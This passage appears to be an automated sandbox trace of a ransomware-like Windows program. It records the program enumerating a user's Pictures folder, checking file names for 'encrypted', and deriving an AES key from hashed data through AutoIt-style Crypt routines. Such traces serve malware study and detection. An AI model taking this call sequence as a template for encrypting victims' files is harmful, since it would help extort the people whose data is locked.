ftLastWriteTime.dwHighDateTime=0x1d5b5e8, nFileSizeHigh=0x0, nFileSizeLow=0xc43c, dwReserved0=0x0, dwReserved1=0x777648, cFileName="HCAqLJKeYC.jpg", cAlternateFileName="HCAQLJ~1.JPG")) returned 0x7c20c0 [0040.717] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.718] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HCAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AqLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qLJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LJKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JKeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KeYC.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.719] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.719] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0040.719] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.719] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.720] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.720] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.720] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.720] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.720] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.720] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67638aa0, ftCreationTime.dwHighDateTime=0x1d5b857, ftLastAccessTime.dwLowDateTime=0x1b168b00, ftLastAccessTime.dwHighDateTime=0x1d5b5e8, ftLastWriteTime.dwLowDateTime=0x1b168b00, ftLastWriteTime.dwHighDateTime=0x1d5b5e8, nFileSizeHigh=0x0, nFileSizeLow=0xc43c, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="HCAqLJKeYC.jpg", cAlternateFileName="HCAQLJ~1.JPG")) returned 0x7c2240 [0040.720] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0040.720] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.720] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.720] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.720] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.720] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0040.720] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.720] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0040.720] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.721] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.721] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0040.721] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.721] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.721] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.721] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.721] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.721] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0040.721] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.721] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0040.722] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.722] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.722] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0040.722] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.722] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.722] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.722] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.722] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.722] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.722] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.723] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.723] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.723] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.723] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.723] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.723] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0040.723] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.723] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.723] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.723] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.723] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.723] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.723] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.723] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.723] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.723] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.723] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.723] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.723] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.723] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.724] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.724] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.724] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.724] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.724] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0040.724] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.724] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.724] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.724] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.724] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0040.724] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.724] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.724] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.724] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.724] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0040.724] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.724] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.724] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.725] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.725] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.725] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.725] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.725] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.725] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0040.725] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.725] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.725] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.725] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.725] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.725] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.725] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0040.725] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.725] CryptDestroyHash (hHash=0x7c2100) returned 1 [0040.725] 